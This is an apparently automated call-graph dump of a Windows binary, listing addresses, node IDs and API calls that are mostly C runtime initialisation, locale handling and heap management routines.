7ffc130eba85 __scrt_uninitialize_crt 10829->10830 10831 7ffc130eba97 10830->10831 10832 7ffc130ec838 __vcrt_uninitialize 8 API calls 10830->10832 10831->10782 10832->10831 10834 7ffc130ec7e5 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 10833->10834 10853 7ffc130ecaa0 10834->10853 10837 7ffc130eb8c3 10837->10799 10841 7ffc130ee090 10837->10841 10842 7ffc130f0e70 10841->10842 10843 7ffc130eb8d0 10842->10843 10904 7ffc130f0df4 10842->10904 10843->10799 10845 7ffc130ec838 10843->10845 10846 7ffc130ec840 10845->10846 10847 7ffc130ec851 10845->10847 10848 7ffc130eca7c __vcrt_uninitialize_ptd 6 API calls 10846->10848 10847->10799 10849 7ffc130ec845 10848->10849 10850 7ffc130ecae8 __vcrt_uninitialize_locks DeleteCriticalSection 10849->10850 10851 7ffc130ec84a 10850->10851 10916 7ffc130ecf10 10851->10916 10854 7ffc130ecaa8 10853->10854 10856 7ffc130ecad9 10854->10856 10857 7ffc130ec7ef 10854->10857 10870 7ffc130ece4c 10854->10870 10858 7ffc130ecae8 __vcrt_uninitialize_locks DeleteCriticalSection 10856->10858 10857->10837 10859 7ffc130eca3c 10857->10859 10858->10857 10885 7ffc130ecce8 10859->10885 10861 7ffc130eca4c 10863 7ffc130ec7fc 10861->10863 10890 7ffc130ecde4 10861->10890 10863->10837 10866 7ffc130ecae8 10863->10866 10864 7ffc130eca69 10864->10863 10895 7ffc130eca7c 10864->10895 10867 7ffc130ecb13 10866->10867 10868 7ffc130ecaf6 DeleteCriticalSection 10867->10868 10869 7ffc130ecb17 10867->10869 10868->10867 10869->10837 10875 7ffc130ecb20 10870->10875 10873 7ffc130ecea3 InitializeCriticalSectionAndSpinCount 10874 7ffc130ece8f 10873->10874 10874->10854 10876 7ffc130ecb86 10875->10876 10877 7ffc130ecb81 10875->10877 10876->10873 10876->10874 10877->10876 10878 7ffc130ecbb9 LoadLibraryExW 10877->10878 10883 7ffc130ecc4e 10877->10883 10884 7ffc130ecc2c FreeLibrary 10877->10884 10878->10877 10879 7ffc130ecbdf GetLastError 10878->10879 10879->10877 10881 7ffc130ecbea LoadLibraryExW 10879->10881 10880 7ffc130ecc5d GetProcAddress 10880->10876 10882 7ffc130ecc75 10880->10882 10881->10877 10882->10876 10883->10876 10883->10880 10884->10877 10886 7ffc130ecb20 try_get_function 5 API calls 10885->10886 10887 7ffc130ecd14 10886->10887 10888 7ffc130ecd2b TlsAlloc 10887->10888 10889 7ffc130ecd1c 10887->10889 10888->10889 10889->10861 10891 7ffc130ecb20 try_get_function 5 API calls 10890->10891 10892 7ffc130ece17 10891->10892 10893 7ffc130ece30 TlsSetValue 10892->10893 10894 7ffc130ece1f 10892->10894 10893->10894 10894->10864 10896 7ffc130eca8b 10895->10896 10897 7ffc130eca90 10895->10897 10899 7ffc130ecd3c 10896->10899 10897->10863 10900 7ffc130ecb20 try_get_function 5 API calls 10899->10900 10901 7ffc130ecd67 10900->10901 10902 7ffc130ecd7d TlsFree 10901->10902 10903 7ffc130ecd6f 10901->10903 10902->10903 10903->10897 10915 7ffc130ef2b0 EnterCriticalSection 10904->10915 10906 7ffc130f0e04 10907 7ffc130f3ac0 33 API calls 10906->10907 10908 7ffc130f0e0d 10907->10908 10909 7ffc130f0c0c 35 API calls 10908->10909 10914 7ffc130f0e1b 10908->10914 10911 7ffc130f0e16 10909->10911 10910 7ffc130ef304 abort LeaveCriticalSection 10912 7ffc130f0e27 10910->10912 10913 7ffc130f0cf8 GetStdHandle GetFileType 10911->10913 10912->10842 10913->10914 10914->10910 10917 7ffc130ecf14 10916->10917 10919 7ffc130ecf48 10916->10919 10918 7ffc130ecf2e FreeLibrary 10917->10918 10917->10919 10918->10917 10919->10847 10921 7ffc130eb9a6 10920->10921 10922 7ffc130eb900 __scrt_initialize_onexit_tables __scrt_release_startup_lock 10920->10922 10923 7ffc130ebc0c __scrt_fastfail 6 API calls 10921->10923 10922->10802 10924 7ffc130eb9b0 10923->10924 10926 7ffc130ebacf 10925->10926 10928 7ffc130ebac5 _onexit 10925->10928 10929 7ffc130edf14 10926->10929 10928->10805 10932 7ffc130edad0 10929->10932 10939 7ffc130ef2b0 EnterCriticalSection 10932->10939 10946 7ffc130ef090 10940->10946 10943 7ffc130ec824 10998 7ffc130ec934 10943->10998 10947 7ffc130eb7e5 10946->10947 10948 7ffc130ef0a1 10946->10948 10947->10943 10949 7ffc130ef5bc _get_daylight 6 API calls 10948->10949 10950 7ffc130ef0a6 10949->10950 10950->10947 10951 7ffc130ef614 _get_daylight 6 API calls 10950->10951 10952 7ffc130ef0bb 10951->10952 10956 7ffc130eef30 10952->10956 10957 7ffc130eef72 10956->10957 10958 7ffc130eef7a 10956->10958 10959 7ffc130ee114 __free_lconv_num 15 API calls 10957->10959 10960 7ffc130ee114 __free_lconv_num 15 API calls 10958->10960 10959->10958 10961 7ffc130eef87 10960->10961 10962 7ffc130ee114 __free_lconv_num 15 API calls 10961->10962 10963 7ffc130eef94 10962->10963 10964 7ffc130ee114 __free_lconv_num 15 API calls 10963->10964 10965 7ffc130eefa1 10964->10965 10966 7ffc130ee114 __free_lconv_num 15 API calls 10965->10966 10967 7ffc130eefae 10966->10967 10968 7ffc130ee114 __free_lconv_num 15 API calls 10967->10968 10969 7ffc130eefbb 10968->10969 10970 7ffc130ee114 __free_lconv_num 15 API calls 10969->10970 10971 7ffc130eefc8 10970->10971 10972 7ffc130ee114 __free_lconv_num 15 API calls 10971->10972 10973 7ffc130eefd5 10972->10973 10974 7ffc130ee114 __free_lconv_num 15 API calls 10973->10974 10975 7ffc130eefe5 10974->10975 10976 7ffc130ee114 __free_lconv_num 15 API calls 10975->10976 10977 7ffc130eeff5 10976->10977 10982 7ffc130eed18 10977->10982 10996 7ffc130ef2b0 EnterCriticalSection 10982->10996 10999 7ffc130eb7ea 10998->10999 11000 7ffc130ec948 10998->11000 10999->10766 11001 7ffc130ec952 11000->11001 11006 7ffc130ecd90 11000->11006 11003 7ffc130ecde4 __vcrt_FlsSetValue 6 API calls 11001->11003 11004 7ffc130ec962 11003->11004 11004->10999 11005 7ffc130ee114 __free_lconv_num 15 API calls 11004->11005 11005->10999 11007 7ffc130ecb20 try_get_function 5 API calls 11006->11007 11008 7ffc130ecdbb 11007->11008 11009 7ffc130ecdd1 TlsGetValue 11008->11009 11010 7ffc130ecdc3 11008->11010 11009->11010 11010->11001 11018 7ffc130ef2b0 EnterCriticalSection 11011->11018 11022 7ffc130ef244 11019->11022 11023 7ffc130ef253 11022->11023 11024 7ffc130eb893 11022->11024 11026 7ffc130ef564 11023->11026 11024->10827 11027 7ffc130ef320 __vcrt_uninitialize_ptd 5 API calls 11026->11027 11028 7ffc130ef58f 11027->11028 11029 7ffc130ef5a6 TlsFree 11028->11029 11030 7ffc130ef597 11028->11030 11029->11030 11030->11024 11980 7ffc130f3358 11981 7ffc130f05f8 49 API calls 11980->11981 11982 7ffc130f3361 11981->11982 11189 201640c1730 11190 201640c908c SetLastError 11189->11190 11191 201640c1765 11190->11191 11192 201640c908c SetLastError 11191->11192 11199 201640c1a0c 11191->11199 11195 201640c17a5 11192->11195 11193 201640c908c SetLastError 11194 201640c1a28 11193->11194 11196 201640c1a69 11194->11196 11197 201640c908c SetLastError 11194->11197 11198 201640c908c SetLastError 11195->11198 11195->11199 11197->11196 11204 201640c17d4 11198->11204 11199->11193 11199->11194 11200 201640c908c SetLastError 11200->11204 11202 201640c19fe 11203 201640c908c SetLastError 11202->11203 11203->11199 11204->11194 11204->11199 11204->11200 11204->11202 11205 201640c5384 11204->11205 11206 201640c53b3 11205->11206 11207 201640c908c SetLastError 11206->11207 11208 201640c5426 11206->11208 11207->11206 11208->11204 11983 7ffc130f6754 11984 7ffc130f6769 CloseHandle 11983->11984 11985 7ffc130f676f 11983->11985 11984->11985 11986 201640c34a4 11987 201640c3699 11986->11987 11988 201640c34db 11986->11988 11988->11987 11989 201640c6c34 4 API calls 11988->11989 11990 201640c34ee 11989->11990 11990->11987 12006 201640c97a0 11990->12006 11992 201640c3684 11993 201640c3689 HeapFree 11992->11993 11993->11987 11994 201640c908c SetLastError 11996 201640c3501 11994->11996 11995 201640c3607 11997 201640c365a 11995->11997 12033 201640c69a0 11995->12033 11996->11992 11996->11994 11996->11995 11996->11997 12021 201640c8d50 11996->12021 12001 201640c908c SetLastError 11997->12001 12002 201640c366a HeapFree 12001->12002 12002->11993 12007 201640c908c SetLastError 12006->12007 12008 201640c97cf 12007->12008 12009 201640c989b 12008->12009 12010 201640c97e8 HeapAlloc 12008->12010 12009->11996 12010->12009 12011 201640c9807 12010->12011 12012 201640c908c SetLastError 12011->12012 12013 201640c9815 12012->12013 12014 201640c988b HeapFree 12013->12014 12015 201640c908c SetLastError 12013->12015 12014->12009 12016 201640c9837 12015->12016 12017 201640c908c SetLastError 12016->12017 12018 201640c9851 12017->12018 12019 201640c908c SetLastError 12018->12019 12020 201640c986c 12019->12020 12020->12009 12020->12014 12022 201640c908c SetLastError 12021->12022 12023 201640c8d96 12022->12023 12024 201640c908c SetLastError 12023->12024 12025 201640c8dad 12024->12025 12026 201640c908c SetLastError 12025->12026 12027 201640c8dcb HeapAlloc 12026->12027 12029 201640c8df6 12027->12029 12030 201640c8e37 12027->12030 12055 201640c61cc 12029->12055 12030->11996 12034 201640c11f4 3 API calls 12033->12034 12035 201640c69d6 12034->12035 12036 201640c3621 12035->12036 12037 201640c69e4 HeapAlloc 12035->12037 12036->11997 12048 201640c90d8 12036->12048 12038 201640c6a16 12037->12038 12039 201640c6a93 HeapFree 12037->12039 12040 201640c908c SetLastError 12038->12040 12039->12036 12041 201640c6a2a 12040->12041 12042 201640c6a6a 12041->12042 12043 201640c6a4c 12041->12043 12075 201640c8e5c 12042->12075 12044 201640c908c SetLastError 12043->12044 12046 201640c6a5a HeapFree 12044->12046 12046->12039 12049 201640c9110 HeapAlloc 12048->12049 12054 201640c3643 HeapFree 12048->12054 12050 201640c9129 12049->12050 12049->12054 12051 201640c908c SetLastError 12050->12051 12052 201640c9155 12051->12052 12053 201640c908c SetLastError 12052->12053 12053->12054 12054->11997 12056 201640c487a memset 12055->12056 12057 201640c6207 12056->12057 12058 201640c8624 3 API calls 12057->12058 12059 201640c622d 12058->12059 12060 201640c908c SetLastError 12059->12060 12061 201640c6247 12060->12061 12062 201640c6339 12061->12062 12063 201640c6294 12061->12063 12064 201640c908c SetLastError 12062->12064 12065 201640c908c SetLastError 12063->12065 12074 201640c632b 12064->12074 12069 201640c62b5 12065->12069 12066 201640c636a HeapFree 12066->12030 12067 201640c635c HeapFree 12067->12066 12068 201640c62f6 12070 201640c908c SetLastError 12068->12070 12069->12068 12071 201640c908c SetLastError 12069->12071 12072 201640c6314 12070->12072 12071->12068 12073 201640c908c SetLastError 12072->12073 12073->12074 12074->12066 12074->12067 12076 201640c908c SetLastError 12075->12076 12077 201640c8ea1 12076->12077 12078 201640c8f6b 12077->12078 12079 201640c8ed8 HeapAlloc 12077->12079 12081 201640c908c SetLastError 12078->12081 12080 201640c8eee 12079->12080 12083 201640c8f2d 12079->12083 12082 201640c908c SetLastError 12080->12082 12081->12083 12084 201640c8efc 12082->12084 12083->12046 12084->12083 12085 201640c908c SetLastError 12084->12085 12086 201640c8f44 HeapFree 12085->12086 12086->12083 12088 201640c16be 12089 201640c908c SetLastError 12088->12089 12090 201640c16d3 12089->12090 11209 7ffc130ebbc4 11210 7ffc130ec868 InterlockedFlushSList 11209->11210 11211 7ffc130ec88c 11210->11211 11213 7ffc130ec879 11210->11213 11212 7ffc130ee114 __free_lconv_num 15 API calls 11212->11213 11213->11211 11213->11212 11214 7ffc130ed2c4 11215 7ffc130ed2ea GetModuleHandleW 11214->11215 11216 7ffc130ed334 11214->11216 11215->11216 11220 7ffc130ed2f7 11215->11220 11232 7ffc130ef2b0 EnterCriticalSection 11216->11232 11220->11216 11227 7ffc130ed47c GetModuleHandleExW 11220->11227 11228 7ffc130ed4a6 GetProcAddress 11227->11228 11229 7ffc130ed4c0 11227->11229 11228->11229 11230 7ffc130ed4d7 FreeLibrary 11229->11230 11231 7ffc130ed4dd 11229->11231 11230->11231 11231->11216 12091 7ffc130fec45 12094 7ffc130ee848 LeaveCriticalSection 12091->12094 11233 7ffc130feac3 __scrt_dllmain_exception_filter 11234 7ffc130ee6c0 11235 7ffc130ee6ea 11234->11235 11236 7ffc130ee26c __vcrt_getptd_noexit 15 API calls 11235->11236 11237 7ffc130ee709 11236->11237 11238 7ffc130ee114 __free_lconv_num 15 API calls 11237->11238 11239 7ffc130ee717 11238->11239 11240 7ffc130ee26c __vcrt_getptd_noexit 15 API calls 11239->11240 11244 7ffc130ee741 11239->11244 11241 7ffc130ee733 11240->11241 11243 7ffc130ee114 __free_lconv_num 15 API calls 11241->11243 11243->11244 11245 7ffc130ee74a 11244->11245 11246 7ffc130ef67c 11244->11246 11247 7ffc130ef320 __vcrt_uninitialize_ptd 5 API calls 11246->11247 11248 7ffc130ef6b7 11247->11248 11249 7ffc130ef6d4 InitializeCriticalSectionAndSpinCount 11248->11249 11250 7ffc130ef6bf 11248->11250 11249->11250 11250->11244 11251 7ffc130ed3f8 11258 7ffc130ee0ec 11251->11258 11259 7ffc130ef0d4 abort 36 API calls 11258->11259 11260 7ffc130ee0f7 11259->11260 11261 7ffc130ee214 abort 36 API calls 11260->11261 11262 7ffc130ee112 11261->11262 11263 7ffc130f16f8 11264 7ffc130f1739 11263->11264 11265 7ffc130f170e 11263->11265 11271 7ffc130ef2b0 EnterCriticalSection 11265->11271 11272 7ffc130eb7f4 11273 7ffc130eb818 __scrt_release_startup_lock 11272->11273 11274 7ffc130ed11d 11273->11274 11275 7ffc130ef168 _get_daylight 15 API calls 11273->11275 11276 7ffc130ed146 11275->11276 12100 7ffc130ecf74 12101 7ffc130ecf98 12100->12101 12103 7ffc130ecfaf 12100->12103 12102 7ffc130ee6a0 _get_daylight 15 API calls 12101->12102 12104 7ffc130ecf9d 12102->12104 12103->12101 12105 7ffc130ecfc6 12103->12105 12106 7ffc130ee580 _invalid_parameter_noinfo 32 API calls 12104->12106 12107 7ffc130ecfcb 12105->12107 12108 7ffc130ecfd8 12105->12108 12110 7ffc130ecfa8 12106->12110 12111 7ffc130ee6a0 _get_daylight 15 API calls 12107->12111 12119 7ffc130ee854 12108->12119 12111->12110 12132 7ffc130ef2b0 EnterCriticalSection 12119->12132 11282 7ffc130eb6ec 11283 7ffc130eb708 11282->11283 11284 7ffc130eb70d 11282->11284 11286 7ffc130ebb08 11283->11286 11287 7ffc130ebb30 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11286->11287 11288 7ffc130ebb9f 11286->11288 11287->11288 11288->11284 9881 7ffc130eb768 9883 7ffc130eb771 __scrt_release_startup_lock 9881->9883 9882 7ffc130eb775 __isa_available_init 9883->9882 9885 7ffc130ed734 9883->9885 9886 7ffc130ed768 9885->9886 9887 7ffc130ed752 9885->9887 9912 7ffc130f05f8 9886->9912 9916 7ffc130ee6a0 9887->9916 9893 7ffc130ed79a 9922 7ffc130ed514 9893->9922 9894 7ffc130ed763 9894->9882 9899 7ffc130ed7e2 9901 7ffc130ee6a0 _get_daylight 15 API calls 9899->9901 9900 7ffc130ed7f3 9902 7ffc130ed514 36 API calls 9900->9902 9911 7ffc130ed7e7 9901->9911 9903 7ffc130ed80f 9902->9903 9905 7ffc130ed858 9903->9905 9906 7ffc130ed83f 9903->9906 9903->9911 9904 7ffc130ee114 __free_lconv_num 15 API calls 9904->9894 9909 7ffc130ee114 __free_lconv_num 15 API calls 9905->9909 9934 7ffc130ee114 9906->9934 9908 7ffc130ed848 9910 7ffc130ee114 __free_lconv_num 15 API calls 9908->9910 9909->9911 9910->9894 9911->9904 9913 7ffc130ed76d GetModuleFileNameA 9912->9913 9914 7ffc130f0605 9912->9914 9913->9893 9940 7ffc130f0440 9914->9940 9917 7ffc130ef168 _get_daylight 15 API calls 9916->9917 9918 7ffc130ed757 9917->9918 9919 7ffc130ee580 9918->9919 10256 7ffc130ee4d8 9919->10256 9924 7ffc130ed552 9922->9924 9926 7ffc130ed5b8 9924->9926 10267 7ffc130f0a00 9924->10267 9925 7ffc130ed6a4 9928 7ffc130ed6d0 9925->9928 9926->9925 9927 7ffc130f0a00 36 API calls 9926->9927 9927->9926 9929 7ffc130ed6eb 9928->9929 9930 7ffc130ed6ef 9928->9930 9929->9899 9929->9900 9930->9929 9931 7ffc130ee26c __vcrt_getptd_noexit 15 API calls 9930->9931 9932 7ffc130ed71e 9931->9932 9933 7ffc130ee114 __free_lconv_num 15 API calls 9932->9933 9933->9929 9935 7ffc130ee119 HeapFree 9934->9935 9936 7ffc130ee149 __free_lconv_num 9934->9936 9935->9936 9937 7ffc130ee134 9935->9937 9936->9908 9938 7ffc130ee6a0 _get_daylight 13 API calls 9937->9938 9939 7ffc130ee139 GetLastError 9938->9939 9939->9936 9960 7ffc130ef0d4 GetLastError 9940->9960 9942 7ffc130f0459 9980 7ffc130f0620 9942->9980 9947 7ffc130f047c 9947->9913 9949 7ffc130f0528 9950 7ffc130ee114 __free_lconv_num 15 API calls 9949->9950 9950->9947 9954 7ffc130f0523 9955 7ffc130ee6a0 _get_daylight 15 API calls 9954->9955 9955->9949 9956 7ffc130f0585 9956->9949 10015 7ffc130efefc 9956->10015 9957 7ffc130f0548 9957->9956 9958 7ffc130ee114 __free_lconv_num 15 API calls 9957->9958 9958->9956 9961 7ffc130ef0f1 9960->9961 9962 7ffc130ef0f6 9960->9962 10022 7ffc130ef5bc 9961->10022 9966 7ffc130ef13f 9962->9966 10027 7ffc130ee26c 9962->10027 9969 7ffc130ef15a SetLastError 9966->9969 9970 7ffc130ef144 SetLastError 9966->9970 9967 7ffc130ef115 9971 7ffc130ee114 __free_lconv_num 15 API calls 9967->9971 10044 7ffc130ee214 9969->10044 9970->9942 9974 7ffc130ef11c 9971->9974 9974->9969 9975 7ffc130ef133 10039 7ffc130eee40 9975->10039 9981 7ffc130ef0d4 abort 36 API calls 9980->9981 9982 7ffc130f062f 9981->9982 9983 7ffc130f064a 9982->9983 10161 7ffc130ef2b0 EnterCriticalSection 9982->10161 9986 7ffc130ee214 abort 36 API calls 9983->9986 9989 7ffc130f0462 9983->9989 9986->9989 9991 7ffc130f014c 9989->9991 10162 7ffc130ee2e4 9991->10162 9994 7ffc130f017e 9996 7ffc130f0193 9994->9996 9997 7ffc130f0183 GetACP 9994->9997 9995 7ffc130f016c GetOEMCP 9995->9996 9996->9947 9998 7ffc130ee154 9996->9998 9997->9996 9999 7ffc130ee19f 9998->9999 10004 7ffc130ee163 __vcrt_getptd_noexit 9998->10004 10000 7ffc130ee6a0 _get_daylight 15 API calls 9999->10000 10002 7ffc130ee19d 10000->10002 10001 7ffc130ee186 RtlAllocateHeap 10001->10002 10001->10004 10002->9949 10005 7ffc130f06e0 10002->10005 10003 7ffc130f0f5c __vcrt_getptd_noexit 2 API calls 10003->10004 10004->9999 10004->10001 10004->10003 10006 7ffc130f014c 38 API calls 10005->10006 10007 7ffc130f070d 10006->10007 10008 7ffc130f0715 10007->10008 10009 7ffc130f0757 IsValidCodePage 10007->10009 10014 7ffc130f077d __scrt_fastfail 10007->10014 10011 7ffc130f6d80 _handle_error 8 API calls 10008->10011 10009->10008 10010 7ffc130f0768 GetCPInfo 10009->10010 10010->10008 10010->10014 10012 7ffc130f051c 10011->10012 10012->9954 10012->9957 10190 7ffc130f025c GetCPInfo 10014->10190 10255 7ffc130ef2b0 EnterCriticalSection 10015->10255 10053 7ffc130ef320 10022->10053 10025 7ffc130ef5fe TlsGetValue 10026 7ffc130ef5ef 10025->10026 10026->9962 10032 7ffc130ee27d __vcrt_getptd_noexit 10027->10032 10028 7ffc130ee2ce 10031 7ffc130ee6a0 _get_daylight 14 API calls 10028->10031 10029 7ffc130ee2b2 HeapAlloc 10030 7ffc130ee2cc 10029->10030 10029->10032 10030->9967 10034 7ffc130ef614 10030->10034 10031->10030 10032->10028 10032->10029 10062 7ffc130f0f5c 10032->10062 10035 7ffc130ef320 __vcrt_uninitialize_ptd 5 API calls 10034->10035 10036 7ffc130ef647 10035->10036 10037 7ffc130ef661 TlsSetValue 10036->10037 10038 7ffc130ef12c 10036->10038 10037->10038 10038->9967 10038->9975 10071 7ffc130eedc0 10039->10071 10085 7ffc130f1018 10044->10085 10054 7ffc130ef381 10053->10054 10058 7ffc130ef37c 10053->10058 10054->10025 10054->10026 10055 7ffc130ef3a9 LoadLibraryExW 10057 7ffc130ef3ca GetLastError 10055->10057 10055->10058 10056 7ffc130ef43c GetProcAddress 10056->10054 10057->10058 10059 7ffc130ef3d5 LoadLibraryExW 10057->10059 10058->10054 10058->10055 10060 7ffc130ef42e 10058->10060 10061 7ffc130ef413 FreeLibrary 10058->10061 10059->10058 10060->10054 10060->10056 10061->10058 10065 7ffc130f0f9c 10062->10065 10070 7ffc130ef2b0 EnterCriticalSection 10065->10070 10083 7ffc130ef2b0 EnterCriticalSection 10071->10083 10119 7ffc130f0fd0 10085->10119 10124 7ffc130ef2b0 EnterCriticalSection 10119->10124 10163 7ffc130ee2ff 10162->10163 10169 7ffc130ee2fa 10162->10169 10164 7ffc130ef0d4 abort 36 API calls 10163->10164 10163->10169 10165 7ffc130ee31c 10164->10165 10170 7ffc130f165c 10165->10170 10169->9994 10169->9995 10171 7ffc130ee340 10170->10171 10172 7ffc130f1671 10170->10172 10174 7ffc130f1690 10171->10174 10172->10171 10178 7ffc130f2b60 10172->10178 10175 7ffc130f16a5 10174->10175 10177 7ffc130f16b8 10174->10177 10176 7ffc130f0620 36 API calls 10175->10176 10175->10177 10176->10177 10177->10169 10179 7ffc130ef0d4 abort 36 API calls 10178->10179 10180 7ffc130f2b6f 10179->10180 10181 7ffc130f2bc1 10180->10181 10189 7ffc130ef2b0 EnterCriticalSection 10180->10189 10181->10171 10196 7ffc130f02a5 10190->10196 10199 7ffc130f0385 10190->10199 10193 7ffc130f6d80 _handle_error 8 API calls 10195 7ffc130f0429 10193->10195 10195->10008 10200 7ffc130f3370 10196->10200 10198 7ffc130f3880 41 API calls 10198->10199 10199->10193 10201 7ffc130ee2e4 36 API calls 10200->10201 10202 7ffc130f33b2 MultiByteToWideChar 10201->10202 10204 7ffc130f33f7 10202->10204 10205 7ffc130f33f0 10202->10205 10207 7ffc130ee154 _onexit 16 API calls 10204->10207 10210 7ffc130f3425 __scrt_fastfail 10204->10210 10206 7ffc130f6d80 _handle_error 8 API calls 10205->10206 10208 7ffc130f0319 10206->10208 10207->10210 10214 7ffc130f3880 10208->10214 10209 7ffc130f3495 MultiByteToWideChar 10211 7ffc130f34b6 GetStringTypeW 10209->10211 10212 7ffc130f34d0 10209->10212 10210->10209 10210->10212 10211->10212 10212->10205 10213 7ffc130ee114 __free_lconv_num 15 API calls 10212->10213 10213->10205 10215 7ffc130ee2e4 36 API calls 10214->10215 10216 7ffc130f38a5 10215->10216 10219 7ffc130f3524 10216->10219 10220 7ffc130f3566 10219->10220 10221 7ffc130f358a MultiByteToWideChar 10220->10221 10222 7ffc130f3835 10221->10222 10223 7ffc130f35bc 10221->10223 10224 7ffc130f6d80 _handle_error 8 API calls 10222->10224 10226 7ffc130ee154 _onexit 16 API calls 10223->10226 10228 7ffc130f35f4 10223->10228 10225 7ffc130f034c 10224->10225 10225->10198 10226->10228 10227 7ffc130f3658 MultiByteToWideChar 10229 7ffc130f367e 10227->10229 10231 7ffc130f3709 10227->10231 10228->10227 10228->10231 10246 7ffc130ef6f4 10229->10246 10231->10222 10233 7ffc130ee114 __free_lconv_num 15 API calls 10231->10233 10233->10222 10234 7ffc130f3718 10237 7ffc130ee154 _onexit 16 API calls 10234->10237 10240 7ffc130f3743 10234->10240 10235 7ffc130f36c6 10235->10231 10236 7ffc130ef6f4 6 API calls 10235->10236 10236->10231 10237->10240 10238 7ffc130ef6f4 6 API calls 10239 7ffc130f37d6 10238->10239 10241 7ffc130f380c 10239->10241 10242 7ffc130f3800 WideCharToMultiByte 10239->10242 10240->10231 10240->10238 10241->10231 10243 7ffc130ee114 __free_lconv_num 15 API calls 10241->10243 10242->10241 10244 7ffc130f386c 10242->10244 10243->10231 10244->10231 10245 7ffc130ee114 __free_lconv_num 15 API calls 10244->10245 10245->10231 10247 7ffc130ef320 __vcrt_uninitialize_ptd 5 API calls 10246->10247 10248 7ffc130ef737 10247->10248 10251 7ffc130ef73f 10248->10251 10252 7ffc130ef7e4 10248->10252 10250 7ffc130ef7a0 LCMapStringW 10250->10251 10251->10231 10251->10234 10251->10235 10253 7ffc130ef320 __vcrt_uninitialize_ptd 5 API calls 10252->10253 10254 7ffc130ef817 10253->10254 10254->10250 10257 7ffc130ef168 _get_daylight 15 API calls 10256->10257 10258 7ffc130ee502 10257->10258 10263 7ffc130ee5a0 IsProcessorFeaturePresent 10258->10263 10264 7ffc130ee5b2 10263->10264 10265 7ffc130ee374 abort 14 API calls 10264->10265 10266 7ffc130ee5cd GetCurrentProcess TerminateProcess 10265->10266 10268 7ffc130f0988 10267->10268 10269 7ffc130ee2e4 36 API calls 10268->10269 10270 7ffc130f09ac 10269->10270 10270->9924 12623 7ffc130ef268 12624 7ffc130ef270 12623->12624 12625 7ffc130ef67c 6 API calls 12624->12625 12626 7ffc130ef2a1 12624->12626 12628 7ffc130ef29d 12624->12628 12625->12624 12629 7ffc130ef2cc 12626->12629 12630 7ffc130ef2f7 12629->12630 12631 7ffc130ef2da DeleteCriticalSection 12630->12631 12632 7ffc130ef2fb 12630->12632 12631->12630 12632->12628 11292 7ffc130f0be4 GetProcessHeap 12633 7ffc130ef964 12634 7ffc130ef98a 12633->12634 12635 7ffc130ef9a0 12633->12635 12636 7ffc130ee6a0 _get_daylight 15 API calls 12634->12636 12641 7ffc130efa0b 12635->12641 12650 7ffc130ef9fe 12635->12650 12655 7ffc130f3218 12635->12655 12663 7ffc130efb70 12635->12663 12637 7ffc130ef98f 12636->12637 12639 7ffc130ee580 _invalid_parameter_noinfo 32 API calls 12637->12639 12642 7ffc130ef999 12639->12642 12640 7ffc130ed6d0 15 API calls 12646 7ffc130efa7e 12640->12646 12641->12640 12643 7ffc130efaf3 12645 7ffc130ee114 __free_lconv_num 15 API calls 12643->12645 12645->12650 12646->12643 12646->12646 12652 7ffc130efb58 12646->12652 12674 7ffc130f3144 12646->12674 12647 7ffc130efb35 12649 7ffc130ee114 __free_lconv_num 15 API calls 12647->12649 12648 7ffc130ee114 __free_lconv_num 15 API calls 12648->12650 12649->12642 12650->12647 12650->12648 12653 7ffc130ee5a0 _invalid_parameter_noinfo 17 API calls 12652->12653 12654 7ffc130efb6c 12653->12654 12656 7ffc130f3237 12655->12656 12657 7ffc130f32b0 12656->12657 12660 7ffc130f3247 12656->12660 12683 7ffc130f6eac 12657->12683 12661 7ffc130f6d80 _handle_error 8 API calls 12660->12661 12662 7ffc130f32a6 12661->12662 12662->12635 12664 7ffc130efba0 12663->12664 12664->12664 12665 7ffc130ee26c __vcrt_getptd_noexit 15 API calls 12664->12665 12666 7ffc130efbea 12665->12666 12667 7ffc130f3144 32 API calls 12666->12667 12668 7ffc130efc1c 12667->12668 12669 7ffc130ee5a0 _invalid_parameter_noinfo 17 API calls 12668->12669 12670 7ffc130efc7f __scrt_fastfail 12669->12670 12671 7ffc130efd3a FindFirstFileExA 12670->12671 12672 7ffc130efda9 12671->12672 12673 7ffc130efb70 32 API calls 12672->12673 12679 7ffc130f3159 12674->12679 12675 7ffc130f315e 12676 7ffc130f3174 12675->12676 12677 7ffc130ee6a0 _get_daylight 15 API calls 12675->12677 12676->12646 12678 7ffc130f3168 12677->12678 12680 7ffc130ee580 _invalid_parameter_noinfo 32 API calls 12678->12680 12679->12675 12679->12676 12681 7ffc130f31a3 12679->12681 12680->12676 12681->12676 12682 7ffc130ee6a0 _get_daylight 15 API calls 12681->12682 12682->12678 12686 7ffc130f6ec0 IsProcessorFeaturePresent 12683->12686 12687 7ffc130f6ed6 12686->12687 12692 7ffc130f6f5c RtlCaptureContext RtlLookupFunctionEntry 12687->12692 12693 7ffc130f6eea 12692->12693 12694 7ffc130f6f8c RtlVirtualUnwind 12692->12694 12695 7ffc130f6da4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12693->12695 12694->12693 11293 201640c825c HeapAlloc 11294 201640c82a5 11293->11294 11313 201640c829d 11293->11313 11295 201640c487a memset 11294->11295 11296 201640c82ba 11295->11296 11297 201640c908c SetLastError 11296->11297 11299 201640c82eb 11297->11299 11298 201640c830e 11300 201640c908c SetLastError 11298->11300 11299->11298 11301 201640c908c SetLastError 11299->11301 11300->11313 11302 201640c8337 11301->11302 11302->11298 11303 201640c835c 11302->11303 11314 201640c89ec 11303->11314 11306 201640c908c SetLastError 11307 201640c838d 11306->11307 11309 201640c908c SetLastError 11307->11309 11310 201640c83ca 11307->11310 11308 201640c908c SetLastError 11308->11310 11309->11310 11310->11308 11311 201640c841a 11310->11311 11310->11313 11312 201640c908c SetLastError 11311->11312 11312->11313 11315 201640c487a memset 11314->11315 11316 201640c8a30 11315->11316 11325 201640c8624 11316->11325 11318 201640c8364 11318->11306 11318->11313 11319 201640c8a9b 11319->11318 11320 201640c908c SetLastError 11319->11320 11321 201640c8ad5 11320->11321 11322 201640c8b3e HeapFree 11321->11322 11323 201640c908c SetLastError 11321->11323 11322->11318 11324 201640c8b2e 11323->11324 11324->11322 11326 201640c8659 11325->11326 11327 201640c86d1 11326->11327 11328 201640c908c SetLastError 11326->11328 11327->11319 11329 201640c8678 11328->11329 11329->11327 11330 201640c8691 HeapAlloc 11329->11330 11330->11327 11331 201640c86ab 11330->11331 